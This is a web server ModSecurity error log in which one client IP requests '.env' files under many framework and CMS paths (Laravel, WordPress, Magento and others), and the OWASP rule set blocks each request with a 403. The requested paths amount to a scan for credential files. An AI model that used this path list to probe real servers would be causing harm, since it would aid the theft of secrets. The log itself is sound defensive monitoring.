[Mon May 11 17:22:47.567197 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agH0R0WKUxpmnkK7zHySWQAAAQs"]
[Mon May 11 17:22:47.567685 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agH0R0WKUxpmnkK7zHySWQAAAQs"]
[Mon May 11 17:22:47.567935 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/prod/.env"] [unique_id "agH0R0WKUxpmnkK7zHySWQAAAQs"]
[Mon May 11 17:22:47.736350 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agH0R0WKUxpmnkK7zHySWgAAAQs"]
[Mon May 11 17:22:47.736832 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agH0R0WKUxpmnkK7zHySWgAAAQs"]
[Mon May 11 17:22:47.737059 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agH0R0WKUxpmnkK7zHySWgAAAQs"]
[Mon May 11 17:22:47.915009 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agH0R0WKUxpmnkK7zHySWwAAAQs"]
[Mon May 11 17:22:47.915548 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agH0R0WKUxpmnkK7zHySWwAAAQs"]
[Mon May 11 17:22:47.915807 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/staging/.env"] [unique_id "agH0R0WKUxpmnkK7zHySWwAAAQs"]
[Mon May 11 17:22:48.082513 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agH0SEWKUxpmnkK7zHySXAAAAQs"]
[Mon May 11 17:22:48.082996 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agH0SEWKUxpmnkK7zHySXAAAAQs"]
[Mon May 11 17:22:48.083263 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agH0SEWKUxpmnkK7zHySXAAAAQs"]
[Mon May 11 17:22:48.245570 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agH0SEWKUxpmnkK7zHySXQAAAQs"]
[Mon May 11 17:22:48.246025 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agH0SEWKUxpmnkK7zHySXQAAAQs"]
[Mon May 11 17:22:48.246257 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agH0SEWKUxpmnkK7zHySXQAAAQs"]
[Mon May 11 17:22:48.408914 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/symfony/.env"] [unique_id "agH0SEWKUxpmnkK7zHySXgAAAQs"]
[Mon May 11 17:22:48.409439 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/symfony/.env"] [unique_id "agH0SEWKUxpmnkK7zHySXgAAAQs"]
[Mon May 11 17:22:48.409680 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/symfony/.env"] [unique_id "agH0SEWKUxpmnkK7zHySXgAAAQs"]
[Mon May 11 17:22:48.572852 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/wordpress/.env"] [unique_id "agH0SEWKUxpmnkK7zHySXwAAAQs"]
[Mon May 11 17:22:48.573362 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/wordpress/.env"] [unique_id "agH0SEWKUxpmnkK7zHySXwAAAQs"]
[Mon May 11 17:22:48.573627 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/wordpress/.env"] [unique_id "agH0SEWKUxpmnkK7zHySXwAAAQs"]
[Mon May 11 17:22:48.737366 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/wp/.env"] [unique_id "agH0SEWKUxpmnkK7zHySYAAAAQs"]
[Mon May 11 17:22:48.737845 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/wp/.env"] [unique_id "agH0SEWKUxpmnkK7zHySYAAAAQs"]
[Mon May 11 17:22:48.738076 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/wp/.env"] [unique_id "agH0SEWKUxpmnkK7zHySYAAAAQs"]
[Mon May 11 17:22:48.914243 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agH0SEWKUxpmnkK7zHySYgAAAQs"]
[Mon May 11 17:22:48.914719 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agH0SEWKUxpmnkK7zHySYgAAAQs"]
[Mon May 11 17:22:48.914952 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agH0SEWKUxpmnkK7zHySYgAAAQs"]
[Mon May 11 17:22:49.076827 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/drupal/.env"] [unique_id "agH0SUWKUxpmnkK7zHySYwAAAQs"]
[Mon May 11 17:22:49.077332 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/drupal/.env"] [unique_id "agH0SUWKUxpmnkK7zHySYwAAAQs"]
[Mon May 11 17:22:49.077586 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/drupal/.env"] [unique_id "agH0SUWKUxpmnkK7zHySYwAAAQs"]
[Mon May 11 17:22:49.238950 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /joomla/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/joomla/.env"] [unique_id "agH0SUWKUxpmnkK7zHySZAAAAQs"]
[Mon May 11 17:22:49.239456 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/joomla/.env"] [unique_id "agH0SUWKUxpmnkK7zHySZAAAAQs"]
[Mon May 11 17:22:49.239672 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/joomla/.env"] [unique_id "agH0SUWKUxpmnkK7zHySZAAAAQs"]
[Mon May 11 17:22:49.401106 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /magento/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/magento/.env"] [unique_id "agH0SUWKUxpmnkK7zHySZQAAAQs"]
[Mon May 11 17:22:49.401643 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/magento/.env"] [unique_id "agH0SUWKUxpmnkK7zHySZQAAAQs"]
[Mon May 11 17:22:49.401900 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/magento/.env"] [unique_id "agH0SUWKUxpmnkK7zHySZQAAAQs"]
[Mon May 11 17:22:49.563244 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shopify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/shopify/.env"] [unique_id "agH0SUWKUxpmnkK7zHySZgAAAQs"]
[Mon May 11 17:22:49.563737 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/shopify/.env"] [unique_id "agH0SUWKUxpmnkK7zHySZgAAAQs"]
[Mon May 11 17:22:49.563973 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/shopify/.env"] [unique_id "agH0SUWKUxpmnkK7zHySZgAAAQs"]
